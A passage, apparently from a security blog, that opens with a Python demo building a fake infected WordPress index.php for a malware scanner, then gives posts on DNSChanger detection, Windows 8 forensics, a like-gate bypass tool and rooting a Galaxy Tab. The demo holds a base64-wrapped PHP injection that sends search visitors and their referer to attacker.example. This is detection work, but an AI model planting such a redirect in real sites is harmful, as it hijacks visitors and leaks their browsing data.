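PAYLOAD = r'''$referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag && !stristr($uag,"MSIE 7.0")) {
  if (stristr($referer,"yahoo") or stristr($referer,"bing") or preg_match("/google\.(.*?)\/url\?sa/",$referer)) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")) {
      header("Location: http://attacker.example/?r=".urlencode($referer)); exit;
    }
  }
}'''

CLEAN_INDEX = "<?php\n// Silence is golden.\n"
INFECTED_INDEX = CLEAN_INDEX + "eval(base64_decode('%s'));\n" % base64.b64encode(PAYLOAD.encode()).decode()


def demo():
    """Write a constructed mini WordPress tree (one clean, one infected index.php) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(CLEAN_INDEX)
        theme = root / "wp-content" / "themes" / "custom"
        theme.mkdir(parents=True)
        (theme / "index.php").write_text(INFECTED_INDEX)
        return scan_tree(root)


if __name__ == "__main__":
    for path, payloads in demo().items():
        for p in payloads:
            print(path, "@", p["offset"], "->", ", ".join(p["indicators"]))
            print(p["decoded"])
```

Pointing scan_tree at a real document root lists the files to clean; because the check decodes the payload rather than matching a fixed string, it also catches the same script when the injection is placed at a different offset or re-encoded.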

Thursday, May 17, 2012

CyberSecurity Malaysia launch its own DNSChanger detection page

CSM has just released another free service for checking for the presence of the DNSChanger trojan. Simply visiting the following website tells you whether your current PC or notebook is infected with DNSChanger or not.

If your PC is clean, you will see 'Congratulations!' on a green background; otherwise the page shows a red background. They also provide free removal tools for Mac and Windows users.

Thursday, May 3, 2012

Windows 8 Forensics Guide

Just reading and sharing something before I go to sleep. It is a basic introduction to the next generation of Windows, Windows 8, and is pretty good for advanced users who want to know a bit more 'in depth' about how the Windows folders, the registry, user and system variables and so on work and where they are located. For malware analysts it is probably good to know for future malware infection cases.

Friday, April 13, 2012

Antap v1.0a - Get Your YouTube Link


What is this software?

This software is named Antap v1.0 (Alpha). Basically, this small program tries to obtain the YouTube link from certain websites that require you to click a 'Share' or 'Like' link first before you can watch the video.

Why is this software needed?

Some users may not be interested in using certain web services that require you to press a 'Share' or 'Like' button before you can watch your favourite video. This technique is used by some websites merely to inflate their visitor numbers indiscriminately.

Basically, all of these videos are hosted on . Most of these third-party sites are designed to gain users from indiscriminate 'Likes' or 'Shares' by visitors.

Some users will find this very annoying. The following are among the websites used:

5. (bypasses the Digg Facebook app)
6. (bypasses the Digg Facebook app)
7. (bypasses the Zakolik Facebook app)
8. or links copied from Facebook.

How do I use it?

Follow these simple steps:

1. Download the software. (It requires .NET Framework 2.0 to run - click here if you don't have it yet.)

2. Run the program directly. See the image below.

3. Get the URL of the video you want to watch. Copy and paste it into the Antap program. See the example image below:


4. Then click the GO! button and the YouTube link will be displayed.

5. So, just click the YouTube link to watch. Good luck!

Download

Click here to download.

NOTE: This software does not contain any viruses or suspicious code. You can also scan it with your antivirus software to see for yourself.

Web version: accessible here

Wednesday, January 4, 2012

Root: Samsung Galaxy Tab 8.9 GT-P7300

I just bought a new Samsung Galaxy Tab 8.9 P7300. There are a lot of cool things we can do with it besides playing games, social networking, notes and other entertainment. Some of you, software developers perhaps, might want more 'fun' with it, but with factory settings there is not much you can do: you can't even run software as simple as a phone-call app or access certain special commands in a terminal console. So, before we start, read the following:

Warning: Make sure you have a backup copy of your firmware.
Warning: Make sure you back up all your important data.
Warning: Your warranty may be voided by this process.
Warning: It is recommended to install the Superuser app so that you are prompted for permission when an app requests root.
Warning: I did this on a Samsung Galaxy Tab 8.9 P7300 with Android 3.1 (Honeycomb) ONLY; I have not tried it on other devices.
Disclaimer: The author of this write-up takes no responsibility for any damage caused by this procedure.

Follow the steps below:

1. First, download this file package. Download here >>

2. Put the file into the root directory of the storage (no need to extract it).

3. Turn OFF your device.

4. Turn your device ON by holding the Power and Volume Down buttons. Repeat this if it does not work the first time.

5. If successful, you'll see two icons on the screen: Recovery and Download Mode. See the picture above.

6. Select Recovery Mode on the left by pressing the Volume Down button, then press Volume Up to confirm.

7. Choose 'apply update from /sdcard' using the volume up/down buttons. Make sure you select the update file in your root storage. Then press the Power button to confirm.

8. You will get an 'Install from sdcard complete' message if it succeeded.

9. Now choose 'reboot system now' to restart your device. It should now be rooted.

10. You can verify whether the device was rooted successfully by opening a terminal console and typing 'su' followed by ENTER, then 'id' followed by ENTER. You'll see that your user id is now 'root', as shown in the image below.

At this point any software that needs a higher access level can be installed and run with root privileges, for example VPNC Widget, Samba Filesharing, Superuser and so on. Have a nice day.

UPDATE (09/01/2012):

Two other devices belonging to friends of mine, a Samsung Galaxy Tab 7.0+ and a Samsung Galaxy Tab 10.1, seem to work with these steps as well.